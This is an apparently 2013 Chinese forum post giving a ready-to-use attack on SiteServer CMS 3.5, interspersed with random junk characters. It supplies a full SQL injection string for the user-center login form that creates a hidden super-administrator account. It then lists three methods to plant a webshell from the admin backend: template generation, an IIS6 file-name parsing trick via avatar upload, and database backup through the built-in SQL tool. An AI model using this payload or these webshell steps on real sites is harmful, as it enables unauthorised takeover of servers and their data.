经测试秒杀最新的3.5版
" c7 k: E; G, K+ k+ o1 p% c. M4 Vstieserver官网:www.siteserver.cn& l4 N0 r" o1 ~/ J, V
EXP:4 z, K0 C/ }7 `
直接访问UserCenter/login.aspx8 S9 _1 c3 K7 H" ^6 y: ]
用户名处输入:
$ G, i2 p; A8 X; L( A C( w7 H0 y9 F- ~+ o: Z% U% f
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–' @, p+ K7 \. W! I) @
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
$ a. n0 Y3 d! Z9 U- b之后再访问后台SiteServer/login.aspx用插入的用户登陆 N8 v) E. y& N4 O+ v( [
后台拿webshell的三种方法:% P! N* B* c8 S' f
一、0 @3 M9 V; `5 o; |
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
' o d6 _5 ?/ {& F0 d, Y' v0 F z二、8 \% B, t/ @' \
成员权限-》添加用户-》用户名为:1.asp1 m* ~! I# _' L
http://127.0.0.1/usercenter/. X( n, z3 G8 Z8 W' d3 O1 S* A
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
1 R- ], \" K9 w, S! s8 e/ z4 g(ps:后台添加用户时不会验证是否含有非法字符)
* p9 N: F" J; V三、4 h% C) ?! D6 c% p" k* r' \
系统工具-》实用工具-》机器参数查看
! j- ~% U, i- |可以看到数据库类型、名称,WEB路径
5 g8 y. |; B/ o系统工具-》数据库工具-》SQL语句查询, Q' c3 v9 J5 l# C/ ] _
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对